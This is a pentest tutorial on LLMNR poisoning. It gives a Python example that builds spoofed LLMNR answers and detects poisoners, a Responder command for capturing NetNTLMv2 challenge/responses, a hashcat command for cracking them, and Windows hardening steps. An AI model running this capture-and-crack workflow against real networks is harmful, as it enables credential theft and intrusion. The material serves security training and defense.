LLMNR Poisoning

What is LLMNR?

LLMNR (Link-Local Multicast Name Resolution) is a decentralized name-resolution protocol modelled on DNS. It resolves hostnames on the local link only: queries go to a link-local multicast group, are never forwarded by routers, and stay inside the network segment they were sent on.

Windows has shipped it since Windows Vista. It is a fallback rather than the primary mechanism: the resolver tries the following methods in order and only moves to the next one when the previous one returns no answer:

  1. DNS

  2. mDNS

  3. LLMNR

  4. NBNS

On a Windows network every host listens on UDP port 5355. To resolve a name, a client sends an LLMNR query to the multicast address 224.0.0.252 in IPv4 (FF02::1:3 in IPv6) on that port. Queries use the DNS message format, so they can carry not only A/AAAA name lookups but any question type DNS supports.

What is LLMNR Poisoning?

In the common case a host uses LLMNR to resolve a name on the local link by multicasting a DNS-format A query. Only the host that owns the queried name should answer, but nothing authenticates the reply: any host on the segment, including an attacker, can answer first, claim the name and redirect the client to itself, which puts the attacker in a man-in-the-middle position.

The key flaw is what happens next. The client connects to the attacker's address with the protocol it was going to use anyway (an SMB share, an HTTP request, a printer) and, when the attacker's service demands NTLM authentication, sends its username and an NTLMv2 challenge/response derived from the user's NT hash. What the attacker captures is that challenge/response (the "NetNTLMv2 hash"), not the NT hash itself: it cannot be used directly for pass-the-hash, but it can be cracked offline to recover the password, or relayed to another host while the session is live.
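To make the exchange concrete, here is an added example (my own code, not Responder's and not part of the original page) that builds the LLMNR query a Windows client multicasts, the poisoned answer an attacker sends back, and a parser for both, using the multicast group and port from the text. The hostname fileshare01, the attacker address 10.10.14.5 and the 30-second TTL are made-up values. The canary check at the end goes beyond the text: a defender queries a name nobody owns, so any host that answers is a poisoner.

```python
import socket
import struct

LLMNR_GROUP = "224.0.0.252"  # IPv4 multicast group used by LLMNR
LLMNR_PORT = 5355            # UDP port every LLMNR-capable host listens on


def encode_name(name: str) -> bytes:
    """DNS wire encoding: length-prefixed labels terminated by a zero byte."""
    out = b"".join(bytes([len(label)]) + label.encode("ascii")
                   for label in name.strip(".").split("."))
    return out + b"\x00"


def decode_name(buf: bytes, off: int):
    """Inverse of encode_name. Only uncompressed names (no 0xC0 pointers) are
    handled, which is all this example ever produces."""
    labels = []
    while True:
        length = buf[off]
        off += 1
        if length == 0:
            return ".".join(labels), off
        if length & 0xC0:
            raise ValueError("compressed names are not handled in this example")
        labels.append(buf[off:off + length].decode("ascii"))
        off += length


def build_query(name: str, txid: int, qtype: int = 1) -> bytes:
    """LLMNR query, same layout as a DNS query: 12-byte header, one question,
    no resource records. flags=0 means QR=0 (query); qtype 1 = A, class 1 = IN."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def parse_message(buf: bytes) -> dict:
    """Parse an LLMNR query or response that carries a single question."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", buf[:12])
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    qname, off = decode_name(buf, 12)
    qtype, _qclass = struct.unpack("!HH", buf[off:off + 4])
    off += 4
    answers = []
    for _ in range(ancount):
        rname, off = decode_name(buf, off)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", buf[off:off + 10])
        off += 10
        rdata = buf[off:off + rdlen]
        off += rdlen
        if rtype == 1 and rdlen == 4:
            rdata = socket.inet_ntoa(rdata)  # render A records as dotted quads
        answers.append({"name": rname, "type": rtype, "ttl": ttl, "data": rdata})
    return {"id": txid, "is_response": bool(flags & 0x8000),
            "qname": qname, "qtype": qtype, "answers": answers}


def build_poisoned_answer(query: bytes, attacker_ip: str, ttl: int = 30) -> bytes:
    """What a poisoner sends back: the victim's transaction ID and question
    echoed verbatim, QR=1, plus one A record pointing at the attacker."""
    q = parse_message(query)
    header = struct.pack("!HHHHHH", q["id"], 0x8000, 1, 1, 0, 0)
    question = encode_name(q["qname"]) + struct.pack("!HH", q["qtype"], 1)
    answer = (encode_name(q["qname"]) + struct.pack("!HHIH", 1, 1, ttl, 4)
              + socket.inet_aton(attacker_ip))
    return header + question + answer


def detect_poisoner(canary: str, sent_txid: int, reply: bytes, src_ip: str):
    """Canary check: nobody legitimately owns `canary`, so a matching answer
    means src_ip is poisoning. Returns the addresses it claims, or None."""
    msg = parse_message(reply)
    if (msg["is_response"] and msg["id"] == sent_txid
            and msg["qname"].lower() == canary.lower()):
        return {"poisoner": src_ip,
                "claims": [a["data"] for a in msg["answers"] if a["type"] == 1]}
    return None


def send_canary(canary: str, txid: int, timeout: float = 2.0):
    """Live version of the check: multicast the canary query and report every
    host that answers. Not run below; it needs a real network interface."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(build_query(canary, txid), (LLMNR_GROUP, LLMNR_PORT))
    hits = []
    try:
        while True:
            data, (src, _) = sock.recvfrom(512)
            hit = detect_poisoner(canary, txid, data, src)
            if hit:
                hits.append(hit)
    except socket.timeout:
        pass
    finally:
        sock.close()
    return hits


if __name__ == "__main__":
    # Constructed exchange: the victim asks for a mistyped share name, the attacker answers.
    query = build_query("fileshare01", txid=0x1234)
    spoofed = build_poisoned_answer(query, "10.10.14.5")
    print("victim asked for:", parse_message(query)["qname"])
    print("poisoned answer :", parse_message(spoofed)["answers"])
    print("canary verdict  :", detect_poisoner("fileshare01", 0x1234, spoofed, "10.10.14.5"))
```

Note what the poisoned answer does not contain: any proof that the sender owns the name. The only thing the victim matches on is the transaction ID and the question it just multicast, both of which every host on the segment has just seen.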

An attacker can use Responder to collect NetNTLMv2 challenge/responses on any segment that has Windows machines on it.

Starting a Responder listener is often one of the first steps of an internal AD pentest: it needs no credentials and simply waits for victims to come to it.

Exploitation

Step 1: Run Responder

Responder answers LLMNR, NBT-NS and mDNS queries with its own address and runs rogue SMB, HTTP and other services to receive the authentication attempts that follow:

responder -I tun0 -dw

-I selects the interface to poison on (tun0 in a VPN lab; on site, use the interface attached to the target segment, e.g. eth0) and -w starts the rogue WPAD proxy. The meaning of -d differs between Responder releases, so check responder -h for the version installed.

Step 2: Wait for an Event

Now wait for a client on the segment to look up a name DNS cannot resolve: a mistyped share path (\\fileshare01 instead of \\fileshare1), a stale drive mapping, or a WPAD lookup with no DNS entry. When DNS returns no answer the client falls back to LLMNR and NBT-NS, and Responder answers the query.

Step 3: Get Hashes

When a victim falls back to LLMNR and connects to the rogue service, Responder prints the username together with the NetNTLMv2 challenge/response and saves each capture to a file under its logs directory in a format hashcat accepts.

Step 4: Crack Hashes

Cracking is GPU-bound. Hashcat's GPU back end (CUDA or OpenCL) is far faster than CPU cracking, and a Kali VM normally has no direct access to the host's GPU, so copy the captured hashes to the host machine that owns the GPU and run hashcat there:

hashcat -m 5600 hashes.txt rockyou.txt -O -r rules/OneRuleToRuleThemAll.rule --debug-mode=1 --debug-file=matched.rule --hwmon-disable

Notes:

  • Install the GPU driver and the CUDA toolkit (NVIDIA) or an OpenCL runtime first; without one hashcat finds no usable device.

  • The hash type is NetNTLMv2, hashcat mode 5600 (NetNTLMv1 captures would be 5500).

  • -r applies the OneRuleToRuleThemAll rule set: https://github.com/NotSoSecure/password_cracking_rules

  • -O enables optimized kernels, which are faster but cap the candidate password length; drop it if you expect long passwords. --debug-mode=1 with --debug-file records which rule produced each crack.

Defense

  • The best defense is to disable both LLMNR and NBT-NS on every host. Responder poisons either protocol, so disabling only one leaves the other path open.

    • To disable LLMNR, set "Turn Off Multicast Name Resolution" to Enabled under "Local Computer Policy -> Computer Configuration -> Administrative Templates -> Network -> DNS Client" in the "Group Policy Editor" (this writes the DWORD EnableMulticast = 0 under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient).

    • To disable NBT-NS, navigate to "Network Connections -> Network Adapter Properties -> TCP/IPv4 Properties -> Advanced -> WINS" and select "Disable NetBIOS over TCP/IP". This is a per-adapter setting (NetbiosOptions = 2 under HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces\Tcpip_{GUID}), so roll it out with a script or DHCP option rather than by hand.

  • If LLMNR/NBT-NS cannot be disabled, reduce the impact instead:

    • Require Network Access Control (e.g. 802.1X), so that an attacker cannot simply plug into the segment and start answering queries.

    • Require long passwords (for example more than 14 characters, with common words blocked). NetNTLMv2 is cheap to compute per guess, so the only thing that limits cracking speed is password strength.
